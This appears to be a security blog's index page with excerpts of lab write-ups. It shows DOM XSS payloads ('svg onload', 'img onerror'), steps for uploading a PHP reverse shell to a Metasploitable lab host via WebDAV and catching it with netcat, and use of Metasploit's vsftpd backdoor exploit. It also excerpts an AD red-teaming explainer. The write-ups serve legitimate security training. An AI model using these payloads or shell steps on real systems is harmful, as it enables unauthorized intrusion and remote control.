Posts

XSS Exploitation

Image
Exe 1: DOM XSS in document.write sink using source location.search Enter a random alphanumeric string into the search box. Right-click and inspect the element, and observe that your random string has been placed inside an img src attribute. Break out of the img attribute by searching for: "><svg onload=alert(1)> Payload: "><svg onload=alert(1)> Exe 2: DOM XSS in innerHTML sink using source location.search Enter the following into the into the search box: <img src=1 onerror=alert(1)> Click ...
Post a Comment
Read more

Lab Key Notes - AD Red Team

Attacker Machine(192.168.50.2) - Victim Machine(Metasploitable)- (192.168.50.3) Perform at Attacker Machine: nc 192.168.50.3 80  --> Victim Machine OPTIONS http://192.168.50.3 host:192.168.50.3 OPTIONS http://192.168.50.3/dav/ HTTP/1.0 host:192.168.50.3 Upload php Web Shell: cadaver http://192.168.50.3/dav/ ls /usr/share/webshells/php/ nano /usr/share/webshells/php/php-reverse-shell.php change to ip: attacker machine (192.168.50.2) port: 1234 Upload shell: put /usr/share/webshells/php/php-reverse-shell.php Get Reverse Shell: nc -nlvp 1234 Basic Commands: $ ifconfig $ /sbin/ifconfig Tool: MSFConsole  $ msfconsole $ search vsftpd $ found ==> exploit/unix/ftp/vsftpd_234_backdoor $ use exploit/unix/ftp/vsftpd_234_backdoor $ show options $ set RHOSTS 192.168.50.3 (Victim Machine)  $ set verbose true $ run Get the command shell: whoami It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...
Post a Comment
Read more

Active Directory - Red Teaming - Part 1

What is Red Teaming? Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them. Red Teams are divided into 3 Groups: Red teams are typically divided into three groups: Cyber , which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social , which exploits human behavior using tactics like phishing or impersonation; and Physical , which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas. Red Team Emulation Emulates (copies) the behavior of a specific real-world threat group—including their tools, techniques, and attack patterns. Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for. Goal: Test how we...
Post a Comment
Read more

Selenium - Setup Browser Driver

Image
 Create the Python file to set up the browser driver 
Post a Comment
Read more